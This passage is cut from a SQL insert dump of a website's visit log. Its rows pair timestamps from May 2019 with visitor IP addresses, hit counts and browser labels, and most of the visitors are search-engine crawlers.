1,1,0,0,'95.108.213.4','other'),(417996,1557197715,1,1,0,0,'40.77.167.143','other'),(417997,1557197822,1,1,0,0,'95.108.181.83','other'),(417998,1557197837,1,1,0,0,'207.46.13.189','other'),(417999,1557198171,1,1,0,0,'5.255.253.16','other'),(418000,1557198575,1,1,0,0,'40.77.167.127','other'),(418001,1557199675,2,2,0,0,'66.249.64.58','chrome'),(418002,1557199729,1,1,0,0,'91.196.178.135','firefox'),(418003,1557200014,2,2,0,0,'66.249.64.31','chrome'),(418004,1557200260,2,2,0,0,'178.154.244.49','other'),(418005,1557200266,1,1,0,0,'93.158.166.7','other'),(418006,1557200350,1,1,0,0,'178.154.171.17','other'),(418007,1557200352,1,1,0,0,'178.154.171.69','other'),(418008,1557200380,1,1,0,0,'141.8.142.108','other'),(418009,1557201349,1,1,0,0,'141.8.142.81','other'),(418010,1557201626,1,1,0,0,'66.249.64.31','chrome'),(418011,1557201781,1,1,0,0,'66.249.64.62','chrome'),(418012,1557202079,1,1,0,0,'13.66.139.0','other'),(418013,1557202166,1,1,0,0,'40.77.167.19','other'),(418014,1557203985,2,2,0,0,'52.32.233.100','chrome'),(418015,1557204137,1,1,0,0,'141.8.142.191','other'),(418016,1557204200,1,1,0,0,'213.180.203.61','other'),(418017,1557204399,1,1,0,0,'95.163.255.162','other'),(418018,1557204931,1,1,0,0,'66.249.64.29','chrome'),(418019,1557205033,1,1,0,0,'66.249.64.31','chrome'),(418020,1557205311,1,1,0,0,'40.77.167.127','other'),(418021,1557205316,2,2,0,0,'40.77.167.114','other'),(418022,1557205647,1,1,0,0,'40.77.167.19','other'),(418023,1557205651,1,1,0,0,'8.29.198.25','other'),(418024,1557205698,1,1,0,0,'8.29.198.26','other'),(418025,1557206228,1,1,0,0,'185.220.101.27','other'),(418026,1557206654,2,2,0,0,'66.249.64.31','chrome'),(418027,1557207253,1,1,0,0,'180.76.15.146','other'),(418028,1557207419,1,1,0,0,'207.46.13.189','other'),(418029,1557207998,3,3,0,0,'66.249.64.29','chrome'),(418030,1557208224,1,1,0,0,'66.249.64.62','chrome'),(418031,1557208451,1,1,0,0,'213.180.203.53','other'),(418032,1557208469,1,1,0,0,'95.163.255.96','other'),(418033,1557208550,1,1,0,0,'94.100.221.234','chrome'),(418034,1557208601,1,1,0,0,'5.255.253.16','other'),(418035,1557208642,1,1,0,0,'91.196.178.82','chrome'),(418036,1557208873,1,1,0,0,'141.8.142.81','other'),(418037,1557208877,1,1,0,0,'141.8.142.65','other'),(418038,1557208956,1,1,0,0,'91.196.179.134','chrome'),(418039,1557209253,1,1,0,0,'180.76.15.7','other'),(418040,1557209358,1,1,0,0,'13.66.139.0','other'),(418041,1557209454,1,1,0,0,'66.249.64.58','chrome'),(418042,1557210601,1,1,0,0,'134.249.178.23','chrome'),(418043,1557211018,1,1,0,0,'66.249.64.29','chrome'),(418044,1557211321,1,1,0,0,'207.46.13.189','other'),(418045,1557211425,2,2,0,0,'66.249.64.31','chrome'),(418046,1557211940,1,1,0,0,'46.211.89.177','chrome'),(418047,1557212048,20,20,0,0,'173.208.200.154','other'),(418048,1557212298,1,1,0,0,'95.163.255.95','other'),(418049,1557212299,1,1,0,0,'46.200.15.13','chrome'),(418050,1557212322,2,2,0,0,'66.249.64.29','chrome'),(418051,1557212629,2,2,0,0,'66.249.64.30','chrome'),(418052,1557212722,1,1,0,0,'66.249.64.60','chrome'),(418053,1557212798,1,1,0,0,'95.163.255.196','other'),(418054,1557213094,1,1,0,0,'141.8.142.191','other'),(418055,1557213469,1,1,0,0,'213.180.203.23','other'),(418056,1557213684,1,1,0,0,'66.249.64.29','chrome'),(418057,1557213878,1,1,0,0,'94.45.122.132','chrome'),(418058,1557214423,1,1,0,0,'94.45.122.133','chrome'),(418059,1557215172,1,1,0,0,'66.249.64.29','chrome'),(418060,1557215222,1,1,0,0,'46.166.137.215','other'),(418061,1557215428,1,1,0,0,'66.249.64.62','chrome'),(418062,1557215464,1,1,0,0,'66.249.64.30','chrome'),(418063,1557215583,2,2,0,0,'66.249.64.31','chrome'),(418064,1557216430,3,3,0,0,'157.55.39.3','other'),(418065,1557216517,1,1,0,0,'8.29.198.26','other'),(418066,1557216536,1,1,0,0,'8.29.198.25','other'),(418067,1557216829,1,1,0,0,'207.46.13.124','other'),(418068,1557217004,1,1,0,0,'37.9.113.38','other'),(418069,1557217008,1,1,0,0,'178.154.244.11','other'),(418070,1557217422,52,52,0,0,'95.216.11.95','other'),(418071,1557217605,1,1,0,0,'37.55.188.136','chrome'),(418072,1557217735,1,1,0,0,'5.45.207.80','other'),(418073,1557217816,1,1,0,0,'178.154.171.69','other'),(418074,1557217904,1,1,0,0,'213.180.203.48','other'),(418075,1557217997,1,1,0,0,'37.54.19.248','chrome'),(418076,1557218005,1,1,0,0,'5.255.253.38','other'),(418077,1557218097,1,1,0,0,'87.250.224.118','other'),(418078,1557218299,1,1,0,0,'141.8.142.65','other'),(418079,1557218631,1,1,0,0,'91.196.178.98','chrome'),(418080,1557219026,1,1,0,0,'66.249.64.60','chrome'),(418081,1557219046,1,1,0,0,'66.249.64.58','chrome'),(418082,1557219051,1,1,0,0,'91.196.178.83','firefox'),(418083,1557219210,1,1,0,0,'178.154.244.11','other'),(418084,1557219212,1,1,0,0,'95.108.213.4','other'),(418085,1557219566,1,1,0,0,'66.249.64.29','chrome'),(418086,1557219628,1,1,0,0,'66.249.64.30','chrome'),(418087,1557219733,2,2,0,0,'40.77.167.146','other'),(418088,1557220252,1,1,0,0,'66.249.64.60','chrome'),(418089,1557220822,1,1,0,0,'66.249.64.30','chrome'),(418090,1557221219,1,1,0,0,'66.249.64.58','chrome'),(418091,1557222391,2,2,0,0,'85.143.219.159','chrome'),(418092,1557222471,1,1,0,0,'95.163.255.173','other'),(418093,1557222568,3,3,0,0,'35.239.17.18','chrome'),(418094,1557222623,3,3,0,0,'104.154.96.148','chrome'),(418095,1557222638,3,3,0,0,'35.239.173.217','chrome'),(418096,1557222651,3,3,0,0,'104.197.29.37','chrome'),(418097,1557222667,3,3,0,0,'34.66.244.120','chrome'),(418098,1557222681,3,3,0,0,'35.192.31.180','chrome'),(418099,1557222686,1,1,0,0,'95.108.213.50','other'),(418100,1557222963,1,1,0,0,'178.154.244.49','other'),(418101,1557222974,1,1,0,0,'213.180.203.53','other'),(418102,1557223140,1,1,0,0,'94.153.229.229','chrome'),(418103,1557223343,1,1,0,0,'66.249.64.30','chrome'),(418104,1557224421,1,1,0,0,'109.74.154.72','chrome'),(418105,1557224981,1,1,0,0,'46.200.250.89','chrome'),(418106,1557225012,2,2,0,0,'66.249.64.29','chrome'),(418107,1557225079,46,46,0,0,'144.76.6.230','other'),(418108,1557225233,2,2,0,0,'66.249.64.31','chrome'),(418109,1557226159,2,2,0,0,'66.249.64.30','chrome'),(418110,1557226243,1,1,0,0,'40.77.167.146','other'),(418111,1557226303,1,1,0,0,'193.106.30.98','chrome'),(418112,1557226751,1,1,0,0,'91.217.179.234','chrome'),(418113,1557226823,1,1,0,0,'66.249.64.31','chrome'),(418114,1557226862,1,1,0,0,'37.73.191.145','chrome'),(418115,1557226957,1,1,0,0,'66.249.64.62','chrome'),(418116,1557227353,2,2,0,0,'66.249.64.58','chrome'),(418117,1557227372,1,1,0,0,'8.29.198.27','other'),(418118,1557227374,1,1,0,0,'8.29.198.25','other'),(418119,1557227701,1,1,0,0,'37.9.113.38','other'),(418120,1557227810,1,1,0,0,'157.55.39.3','other'),(418121,1557227922,1,1,0,0,'213.180.203.53','other'),(418122,1557228083,1,1,0,0,'91.196.178.136','chrome'),(418123,1557228121,1,1,0,0,'141.8.142.191','other'),(418124,1557228208,1,1,0,0,'66.249.64.62','chrome'),(418125,1557228812,1,1,0,0,'66.249.64.30','chrome'),(418126,1557228884,1,1,0,0,'178.154.171.27','other'),(418127,1557229414,1,1,0,0,'40.77.167.87','other'),(418128,1557229468,1,1,0,0,'66.249.64.29','chrome'),(418129,1557229774,1,1,0,0,'91.196.178.82','chrome'),(418130,1557230165,1,1,0,0,'78.154.160.206','chrome'),(418131,1557230815,74,74,0,0,'198.204.244.90','other'),(418132,1557231017,1,1,0,0,'91.196.178.82','chrome'),(418133,1557231434,4,4,0,0,'66.249.64.31','chrome'),(418134,1557231590,21,21,0,0,'207.180.218.247','other'),(418135,1557231631,2,2,0,0,'194.44.128.154','chrome'),(418136,1557231717,69,69,0,0,'198.204.244.90','other'),(418137,1557232484,1,1,0,0,'40.77.167.146','other'),(418138,1557232503,1,1,0,0,'46.250.119.137','firefox'),(418139,1557232608,2,2,0,0,'178.92.156.212','chrome'),(418140,1557232621,28,28,0,0,'198.204.244.90','other'),(418141,1557232858,1,1,0,0,'87.250.224.118','other'),(418142,1557232994,1,1,0,0,'178.154.171.30','other'),(418143,1557233484,1,1,0,0,'93.158.166.7','other'),(418144,1557233633,2,2,0,0,'66.249.64.60','chrome'),(418145,1557233806,1,1,0,0,'157.55.39.59','other'),(418146,1557234121,1,1,0,0,'66.249.64.30','chrome'),(418147,1557235141,1,1,0,0,'157.55.39.59','other'),(418148,1557235603,1,1,0,0,'180.76.15.22','other'),(418149,1557235971,2,2,0,0,'66.249.64.29','chrome'),(418150,1557237499,1,1,0,0,'66.249.64.60','chrome'),(418151,1557238009,1,1,0,0,'40.77.167.87','other'),(418152,1557238016,1,1,0,0,'66.249.64.30','chrome'),(418153,1557238225,1,1,0,0,'8.29.198.27','other'),(418154,1557238233,1,1,0,0,'8.29.198.25','other'),(418155,1557238988,1,1,0,0,'91.196.179.134','chrome'),(418156,1557239112,1,1,0,0,'40.77.167.82','other'),(418157,1557239868,1,1,0,0,'66.249.64.31','chrome'),(418158,1557240675,1,1,0,0,'40.77.167.82','other'),(418159,1557240690,1,1,0,0,'195.78.69.16','chrome'),(418160,1557240945,1,1,0,0,'178.154.200.8','other'),(418161,1557241201,1,1,0,0,'178.154.171.69','other'),(418162,1557242268,1,1,0,0,'40.77.167.82','other'),(418163,1557243900,1,1,0,0,'40.77.167.82','other'),(418164,1557244227,1,1,0,0,'87.250.224.118','other'),(418165,1557245337,1,1,0,0,'40.77.167.82','other'),(418166,1557245379,1,1,0,0,'157.55.39.239','other'),(418167,1557245472,1,1,0,0,'178.154.244.49','other'),(418168,1557245519,1,1,0,0,'93.158.166.7','other'),(418169,1557245533,2,2,0,0,'5.255.253.38','other'),(418170,1557246016,1,1,0,0,'66.249.64.58','chrome'),(418171,1557246728,1,1,0,0,'91.196.178.182','chrome'),(418172,1557247070,1,1,0,0,'91.196.178.71','firefox'),(418173,1557247086,1,1,0,0,'207.46.13.14','other'),(418174,1557247227,1,1,0,0,'66.249.64.29','chrome'),(418175,1557247627,1,1,0,0,'91.196.178.162','chrome'),(418176,1557248152,1,1,0,0,'66.249.64.30','chrome'),(418177,1557249073,1,1,0,0,'8.29.198.27','other'),(418178,1557249099,1,1,0,0,'8.29.198.25','other'),(418179,1557249541,2,2,0,0,'66.249.64.30','chrome'),(418180,1557249556,1,1,0,0,'66.249.64.29','chrome'),(418181,1557249597,1,1,0,0,'157.55.39.10','other'),(418182,1557250196,1,1,0,0,'95.163.255.96','other'),(418183,1557250309,1,1,0,0,'207.46.13.14','other'),(418184,1557251117,1,1,0,0,'94.248.15.228','chrome'),(418185,1557251379,1,1,0,0,'66.249.64.31','chrome'),(418186,1557251908,1,1,0,0,'66.249.64.62','chrome'),(418187,1557252557,1,1,0,0,'178.92.73.128','chrome'),(418188,1557253033,1,1,0,0,'178.154.244.21','other'),(418189,1557253036,1,1,0,0,'178.154.200.8','other'),(418190,1557253064,1,1,0,0,'178.154.171.30','other'),(418191,1557253317,1,1,0,0,'37.9.113.38','other'),(418192,1557253561,1,1,0,0,'207.46.13.51','other'),(418193,1557253682,1,1,0,0,'157.55.39.10','other'),(418194,1557253888,1,1,0,0,'95.163.255.97','other'),(418195,1557254124,1,1,0,0,'66.249.64.60','chrome'),(418196,1557255254,1,1,0,0,'95.163.255.92','other'),(418197,1557256082,1,1,0,0,'157.55.39.239','other'),(418198,1557256710,1,1,0,0,'213.180.203.48','other'),(418199,1557256998,1,1,0,0,'207.46.13.220','other'),(418200,1557257118,1,1,0,0,'66.249.64.29','chrome'),(418201,1557257327,1,1,0,0,'178.93.148.41','chrome'),(418202,1557257967,1,1,0,0,'213.180.203.48','other'),(418203,1557257970,1,1,0,0,'141.8.142.108','other'),(418204,1557258331,1,1,0,0,'207.46.13.220','other'),(418205,1557258347,3,3,0,0,'66.249.64.30','chrome'),(418206,1557259330,1,1,0,0,'66.249.64.31','chrome'),(418207,1557259458,1,1,0,0,'157.55.39.239','other'),(418208,1557259675,1,1,0,0,'66.249.64.30','chrome'),(418209,1557259905,1,1,0,0,'78.154.176.230','chrome'),(418210,1557259913,2,2,0,0,'8.29.198.25','other'),(418211,1557259981,1,1,0,0,'213.180.203.53','other'),(418212,1557260179,1,1,0,0,'178.154.171.69','other'),(418213,1557260455,1,1,0,0,'91.196.178.165','chrome'),(418214,1557260508,1,1,0,0,'5.255.253.38','other'),(418215,1557260586,1,1,0,0,'141.8.142.81','other'),(418216,1557260606,2,2,0,0,'37.9.113.38','other'),(418217,1557260639,2,2,0,0,'66.249.64.31','chrome'),(418218,1557261409,1,1,0,0,'93.125.99.82','firefox'),(418219,1557261543,1,1,0,0,'180.76.15.153','other'),(418220,1557261708,1,1,0,0,'66.249.64.60','chrome'),(418221,1557261918,1,1,0,0,'95.163.255.97','other'),(418222,1557262508,2,2,0,0,'95.163.255.98','other'),(418223,1557262663,1,1,0,0,'66.249.64.29','chrome'),(418224,1557262687,1,1,0,0,'95.163.255.184','other'),(418225,1557263413,1,1,0,0,'207.46.13.154','other'),(418226,1557263637,1,1,0,0,'87.250.224.107','other'),(418227,1557264548,1,1,0,0,'141.8.142.108','other'),(418228,1557264707,1,1,0,0,'5.255.253.22','other'),(418229,1557265842,3,3,0,0,'35.225.104.139','chrome'),(418230,1557265846,1,1,0,0,'95.163.255.97','other'),(418231,1557265866,3,3,0,0,'35.226.96.192','chrome'),(418232,1557265882,3,3,0,0,'35.224.158.105','chrome'),(418233,1557266177,1,1,0,0,'95.163.255.95','other'),(418234,1557266189,1,1,0,0,'178.154.244.11','other'),(418235,1557266998,1,1,0,0,'66.249.64.31','chrome'),(418236,1557267511,1,1,0,0,'66.249.64.58','chrome'),(418237,1557268014,2,2,0,0,'66.249.64.29','chrome'),(418238,1557268205,1,1,0,0,'66.249.64.30','chrome'),(418239,1557268424,1,1,0,0,'5.255.253.38','other'),(418240,1557268969,1,1,0,0,'95.108.181.83','other'),(418241,1557269346,1,1,0,0,'37.9.113.38','other'),(418242,1557269866,1,1,0,0,'66.249.64.30','chrome'),(418243,1557270751,1,1,0,0,'8.29.198.25','other'),(418244,1557270774,2,2,0,0,'40.77.167.47','other'),(418245,1557270818,1,1,0,0,'8.29.198.26','other'),(418246,1557271479,2,2,0,0,'66.249.64.30','chrome'),(418247,1557271725,1,1,0,0,'66.249.64.62','chrome'),(418248,1557271780,82,82,0,0,'62.210.202.81','msie'),(418249,1557272237,1,1,0,0,'66.249.64.31','chrome'),(418250,1557272842,1,1,0,0,'207.46.13.116','other'),(418251,1557273103,1,1,0,0,'157.55.39.50','other'),(418252,1557273812,1,1,0,0,'185.34.136.211','firefox'),(418253,1557274255,1,1,0,0,'157.55.39.87','other'),(418254,1557274851,1,1,0,0,'66.249.64.31','chrome'),(418255,1557275234,3,3,0,0,'69.58.178.56','other'),(418256,1557276025,1,1,0,0,'5.255.253.38','other'),(418257,1557276546,1,1,0,0,'13.66.139.0','other'),(418258,1557278027,1,1,0,0,'66.249.64.29','chrome'),(418259,1557278741,1,1,0,0,'66.249.64.30','chrome'),(418260,1557280264,1,1,0,0,'66.249.64.62','chrome'),(418261,1557280318,1,1,0,0,'157.55.39.88','other'),(418262,1557280620,3,3,0,0,'72.13.36.80','other'),(418263,1557280708,3,3,0,0,'66.249.64.29','chrome'),(418264,1557280938,1,1,0,0,'66.249.64.31','chrome'),(418265,1557281031,1,1,0,0,'66.249.64.30','chrome'),(418266,1557281601,1,1,0,0,'8.29.198.25','other'),(418267,1557281663,1,1,0,0,'8.29.198.26','other'),(418268,1557282114,1,1,0,0,'5.255.253.25','other'),(418269,1557282289,1,1,0,0,'157.55.39.88','other'),(418270,1557282333,1,1,0,0,'213.180.203.23','other'),(418271,1557282427,1,1,0,0,'66.249.64.30','chrome'),(418272,1557282487,1,1,0,0,'66.249.64.31','chrome'),(418273,1557282530,1,1,0,0,'178.154.244.49','other'),(418274,1557283087,1,1,0,0,'40.77.167.101','other'),(418275,1557283416,1,1,0,0,'95.163.255.98','other'),(418276,1557283477,2,2,0,0,'66.249.64.29','chrome'),(418277,1557283658,1,1,0,0,'141.8.183.11','other'),(418278,1557284196,1,1,0,0,'66.249.64.62','chrome'),(418279,1557284335,1,1,0,0,'157.55.39.249','other'),(418280,1557285762,1,1,0,0,'213.180.203.48','other'),(418281,1557285858,1,1,0,0,'66.249.64.30','chrome'),(418282,1557286082,1,1,0,0,'66.249.64.60','chrome'),(418283,1557286112,1,1,0,0,'157.55.39.140','other'),(418284,1557287031,1,1,0,0,'157.55.39.148','other'),(418285,1557287344,1,1,0,0,'13.66.139.0','other'),(418286,1557287393,1,1,0,0,'5.255.253.38','other'),(418287,1557287549,2,2,0,0,'157.55.39.140','other'),(418288,1557287772,1,1,0,0,'66.249.64.31','chrome'),(418289,1557288070,1,1,0,0,'80.243.150.229','chrome'),(418290,1557288699,1,1,0,0,'66.249.64.62','chrome'),(418291,1557288864,2,2,0,0,'66.249.64.58','chrome'),(418292,1557288980,1,1,0,0,'5.255.253.22','other'),(418293,1557289257,1,1,0,0,'66.249.64.31','chrome'),(418294,1557289320,1,1,0,0,'178.154.244.49','other'),(418295,1557289519,1,1,0,0,'213.180.203.53','other'),(418296,1557289546,1,1,0,0,'178.154.171.30','other'),(418297,1557289637,1,1,0,0,'66.249.64.30','chrome'),(418298,1557290162,1,1,0,0,'95.163.255.96','other'),(418299,1557290464,1,1,0,0,'47.106.120.58','chrome'),(418300,1557290729,2,2,0,0,'66.249.64.31','chrome'),(418301,1557291109,1,1,0,0,'66.249.64.30','chrome'),(418302,1557291315,1,1,0,0,'130.180.209.127','chrome'),(418303,1557291417,1,1,0,0,'66.249.64.62','chrome'),(418304,1557291707,1,1,0,0,'157.55.39.140','other'),(418305,1557291732,1,1,0,0,'95.163.255.99','other'),(418306,1557291942,2,2,0,0,'66.249.64.29','chrome'),(418307,1557292435,1,1,0,0,'8.29.198.25','other'),(418308,1557292515,1,1,0,0,'8.29.198.27','other'),(418309,1557292652,1,1,0,0,'54.36.108.162','other'),(418310,1557292987,1,1,0,0,'66.249.64.29','chrome'),(418311,1557293043,1,1,0,0,'46.200.250.89','chrome'),(418312,1557293177,2,2,0,0,'66.249.64.30','chrome'),(418313,1557293201,1,1,0,0,'87.250.224.107','other'),(418314,1557293676,1,1,0,0,'176.126.162.121','chrome'),(418315,1557293915,1,1,0,0,'91.196.178.93','chrome'),(418316,1557294222,1,1,0,0,'66.249.64.58','chrome'),(418317,1557294464,3,3,0,0,'66.249.64.29','chrome'),(418318,1557294546,1,1,0,0,'66.249.64.31','chrome'),(418319,1557294626,1,1,0,0,'91.196.178.85','chrome'),(418320,1557295085,1,1,0,0,'104.148.64.26','chrome'),(418321,1557295645,1,1,0,0,'5.45.207.80','other'),(418322,1557295867,1,1,0,0,'91.196.177.118','chrome'),(418323,1557296233,2,2,0,0,'54.213.75.140','chrome'),(418324,1557296473,1,1,0,0,'193.105.62.60','chrome'),(418325,1557296638,1,1,0,0,'46.211.100.169','chrome'),(418326,1557296752,1,1,0,0,'91.196.178.85','chrome'),(418327,1557297028,1,1,0,0,'213.180.203.61','other'),(418328,1557297424,1,1,0,0,'157.55.39.140','other'),(418329,1557297507,1,1,0,0,'141.8.142.81','other'),(418330,1557297683,1,1,0,0,'178.154.244.11','other'),(418331,1557298124,1,1,0,0,'40.77.167.5','other'),(418332,1557299425,1,1,0,0,'91.196.179.134','chrome'),(418333,1557299850,1,1,0,0,'37.54.63.59','chrome'),(418334,1557299900,1,1,0,0,'40.77.167.5','other'),(418335,1557301056,1,1,0,0,'66.249.64.29','chrome'),(418336,1557301581,1,1,0,0,'178.154.171.69','other'),(418337,1557301689,1,1,0,0,'178.154.200.8','other'),(418338,1557301976,1,1,0,0,'91.124.41.75','chrome'),(418339,1557302057,1,1,0,0,'91.124.44.237','chrome'),(418340,1557302319,1,1,0,0,'209.17.96.66','other'),(418341,1557302429,1,1,0,0,'40.77.167.189','other'),(418342,1557302754,1,1,0,0,'66.249.64.31','chrome'),(418343,1557303280,1,1,0,0,'8.29.198.27','other'),(418344,1557303362,1,1,0,0,'8.29.198.26','other'),(418345,1557303368,1,1,0,0,'40.77.167.189','other'),(418346,1557303512,1,1,0,0,'46.211.43.173','chrome'),(418347,1557303561,1,1,0,0,'66.249.64.58','chrome'),(418348,1557304393,1,1,0,0,'66.249.64.30','chrome'),(418349,1557305257,1,1,0,0,'157.55.39.170','other'),(418350,1557305475,1,1,0,0,'95.108.181.83','other'),(418351,1557305513,1,1,0,0,'178.154.244.11','other'),(418352,1557305573,1,1,0,0,'95.108.181.57','other'),(418353,1557306098,1,1,0,0,'66.249.64.31','chrome'),(418354,1557306490,1,1,0,0,'95.108.213.50','other'),(418355,1557306593,1,1,0,0,'46.133.162.178','firefox'),(418356,1557306849,1,1,0,0,'91.196.178.172','chrome'),(418357,1557307539,1,1,0,0,'66.249.64.30','chrome'),(418358,1557307720,1,1,0,0,'157.55.39.170','other'),(418359,1557307728,1,1,0,0,'91.196.178.90','chrome'),(418360,1557307934,1,1,0,0,'40.77.167.189','other'),(418361,1557308190,2,2,0,0,'66.249.64.31','chrome'),(418362,1557308634,1,1,0,0,'157.55.39.170','other'),(418363,1557308976,1,1,0,0,'46.211.74.205','other'),(418364,1557309234,3,3,0,0,'35.226.95.95','chrome'),(418365,1557309274,3,3,0,0,'35.224.25.30','chrome'),(418366,1557309287,3,3,0,0,'35.193.217.178','chrome'),(418367,1557309302,3,3,0,0,'35.184.52.96','chrome'),(418368,1557309315,3,3,0,0,'162.222.177.173','chrome'),(418369,1557309327,3,3,0,0,'35.192.239.192','chrome'),(418370,1557309487,2,2,0,0,'66.249.64.29','chrome'),(418371,1557309531,1,1,0,0,'5.255.253.16','other'),(418372,1557309560,1,1,0,0,'178.154.171.17','other'),(418373,1557309588,1,1,0,0,'5.255.253.22','other'),(418374,1557309655,1,1,0,0,'87.250.224.107','other'),(418375,1557309663,1,1,0,0,'95.108.181.83','other'),(418376,1557309970,1,1,0,0,'46.200.250.89','chrome'),(418377,1557310736,1,1,0,0,'109.74.154.72','chrome'),(418378,1557310800,3,3,0,0,'66.249.64.30','chrome'),(418379,1557311090,1,1,0,0,'91.196.177.151','chrome'),(418380,1557311673,2,2,0,0,'95.213.141.126','opera'),(418381,1557311963,2,2,0,0,'66.249.64.29','chrome'),(418382,1557312568,1,1,0,0,'95.163.255.96','other'),(418383,1557312977,1,1,0,0,'37.54.106.153','chrome'),(418384,1557313089,1,1,0,0,'157.55.39.170','other'),(418385,1557313357,1,1,0,0,'66.249.64.29','chrome'),(418386,1557313413,1,1,0,0,'66.249.64.30','chrome'),(418387,1557313511,2,2,0,0,'91.196.177.15','chrome'),(418388,1557313598,1,1,0,0,'95.163.255.175','other'),(418389,1557313606,1,1,0,0,'95.108.181.83','other'),(418390,1557313610,1,1,0,0,'178.154.171.30','other'),(418391,1557313614,1,1,0,0,'141.8.142.162','other'),(418392,1557313622,1,1,0,0,'178.154.244.49','other'),(418393,1557313818,1,1,0,0,'66.102.9.62','chrome'),(418394,1557314083,1,1,0,0,'40.77.167.189','other'),(418395,1557314135,1,1,0,0,'8.29.198.27','other'),(418396,1557314168,1,1,0,0,'91.124.182.170','firefox'),(418397,1557314210,1,1,0,0,'40.77.167.50','other'),(418398,1557314215,1,1,0,0,'8.29.198.26','other'),(418399,1557314839,1,1,0,0,'66.249.64.30','chrome'),(418400,1557315959,1,1,0,0,'66.249.64.29','chrome'),(418401,1557316010,1,1,0,0,'157.55.39.170','other'),(418402,1557316014,1,1,0,0,'40.77.167.189','other'),(418403,1557316647,1,1,0,0,'178.154.244.21','other'),(418404,1557316676,1,1,0,0,'95.108.181.83','other'),(418405,1557316713,1,1,0,0,'178.154.200.8','other'),(418406,1557316752,1,1,0,0,'91.196.178.133','firefox'),(418407,1557316880,1,1,0,0,'213.180.203.48','other'),(418408,1557317376,1,1,0,0,'66.249.64.31','chrome'),(418409,1557317953,1,1,0,0,'66.249.64.30','chrome'),(418410,1557318090,1,1,0,0,'95.163.255.99','other'),(418411,1557318168,1,1,0,0,'207.46.13.22','other'),(418412,1557318218,1,1,0,0,'109.201.138.234','other'),(418413,1557318723,1,1,0,0,'157.55.39.240','other'),(418414,1557318789,1,1,0,0,'46.211.134.46','chrome'),(418415,1557319245,1,1,0,0,'66.249.64.31','chrome'),(418416,1557319268,1,1,0,0,'107.178.194.29','chrome'),(418417,1557319309,1,1,0,0,'95.163.255.153','other'),(418418,1557319746,1,1,0,0,'91.209.11.236','other'),(418419,1557319840,1,1,0,0,'91.124.182.170','firefox'),(418420,1557319850,1,1,0,0,'178.154.200.8','other'),(418421,1557320026,1,1,0,0,'66.249.64.30','chrome'),(418422,1557320109,1,1,0,0,'66.249.64.29','chrome'),(418423,1557320235,1,1,0,0,'31.4.132.49','chrome'),(418424,1557320536,1,1,0,0,'91.124.182.170','chrome'),(418425,1557320563,1,1,0,0,'95.163.255.94','other'),(418426,1557320850,1,1,0,0,'46.211.134.46','chrome'),(418427,1557321051,1,1,0,0,'91.209.11.236','other'),(418428,1557321221,2,2,0,0,'66.249.64.30','chrome'),(418429,1557321869,1,1,0,0,'51.68.152.26','chrome'),(418430,1557321943,1,1,0,0,'207.46.13.204','other'),(418431,1557322018,1,1,0,0,'178.95.92.13','chrome'),(418432,1557322585,1,1,0,0,'91.124.182.170','firefox'),(418433,1557322710,1,1,0,0,'5.255.253.38','other'),(418434,1557322773,1,1,0,0,'46.211.134.46','chrome'),(418435,1557322968,1,1,0,0,'109.201.154.211','other'),(418436,1557322976,1,1,0,0,'66.249.64.58','chrome'),(418437,1557323051,1,1,0,0,'95.108.181.94','other'),(418438,1557324911,1,1,0,0,'213.180.203.53','other'),(418439,1557325001,1,1,0,0,'8.29.198.25','other'),(418440,1557325017,1,1,0,0,'95.163.255.94','other'),(418441,1557325079,1,1,0,0,'8.29.198.27','other'),(418442,1557325653,1,1,0,0,'95.163.255.97','other'),(418443,1557325719,1,1,0,0,'87.250.224.118','other'),(418444,1557325984,1,1,0,0,'93.158.166.7','other'),(418445,1557326163,1,1,0,0,'87.250.224.99','other'),(418446,1557326388,1,1,0,0,'66.249.64.31','chrome'),(418447,1557326543,1,1,0,0,'40.77.167.157','other'),(418448,1557326615,1,1,0,0,'66.249.64.29','chrome'),(418449,1557327310,1,1,0,0,'46.211.110.156','chrome'),(418450,1557327802,1,1,0,0,'66.249.64.29','chrome'),(418451,1557328463,1,1,0,0,'207.46.13.157','other'),(418452,1557328525,1,1,0,0,'95.163.255.98','other'),(418453,1557328935,1,1,0,0,'66.249.64.29','chrome'),(418454,1557329146,1,1,0,0,'66.249.64.60','chrome'),(418455,1557329228,1,1,0,0,'66.249.64.30','chrome'),(418456,1557329484,1,1,0,0,'157.55.39.69','other'),(418457,1557329825,1,1,0,0,'207.46.13.157','other'),(418458,1557329928,1,1,0,0,'66.249.64.62','chrome'),(418459,1557331553,1,1,0,0,'46.166.137.200','other'),(418460,1557331644,1,1,0,0,'95.108.181.94','other'),(418461,1557331648,1,1,0,0,'207.46.13.157','other'),(418462,1557331726,2,2,0,0,'66.249.64.62','chrome'),(418463,1557332087,1,1,0,0,'46.211.70.213','other'),(418464,1557332124,1,1,0,0,'95.163.255.161','other'),(418465,1557332160,1,1,0,0,'141.8.142.162','other'),(418466,1557332324,1,1,0,0,'157.55.39.69','other'),(418467,1557332582,1,1,0,0,'194.0.89.50','chrome'),(418468,1557332629,2,2,0,0,'207.46.13.157','other'),(418469,1557333173,1,1,0,0,'95.163.255.93','other'),(418470,1557333787,1,1,0,0,'157.55.39.69','other'),(418471,1557334672,2,2,0,0,'66.249.66.218','chrome'),(418472,1557334774,1,1,0,0,'182.23.38.40','firefox'),(418473,1557334978,1,1,0,0,'5.188.45.160','chrome'),(418474,1557335427,1,1,0,0,'5.255.253.25','other'),(418475,1557335599,1,1,0,0,'130.180.218.85','firefox'),(418476,1557335609,1,1,0,0,'141.8.142.81','other'),(418477,1557335849,1,1,0,0,'8.29.198.27','other'),(418478,1557335938,1,1,0,0,'8.29.198.25','other'),(418479,1557336119,1,1,0,0,'93.158.166.7','other'),(418480,1557336544,1,1,0,0,'157.55.39.9','other'),(418481,1557336545,1,1,0,0,'95.163.255.93','other'),(418482,1557336629,1,1,0,0,'46.211.132.77','chrome'),(418483,1557336720,1,1,0,0,'66.249.66.220','chrome'),(418484,1557337023,1,1,0,0,'66.249.66.222','chrome'),(418485,1557337101,1,1,0,0,'157.55.39.69','other'),(418486,1557337287,1,1,0,0,'40.77.167.157','other'),(418487,1557337487,1,1,0,0,'95.163.255.93','other'),(418488,1557338042,1,1,0,0,'95.163.255.164','other'),(418489,1557338084,1,1,0,0,'66.249.66.220','chrome'),(418490,1557338172,1,1,0,0,'95.163.255.154','other'),(418491,1557338195,1,1,0,0,'95.163.255.165','other'),(418492,1557338236,1,1,0,0,'157.55.39.69','other'),(418493,1557339166,1,1,0,0,'104.197.197.22','other'),(418494,1557339523,1,1,0,0,'213.180.203.61','other'),(418495,1557339669,1,1,0,0,'95.163.255.94','other'),(418496,1557339728,1,1,0,0,'157.55.39.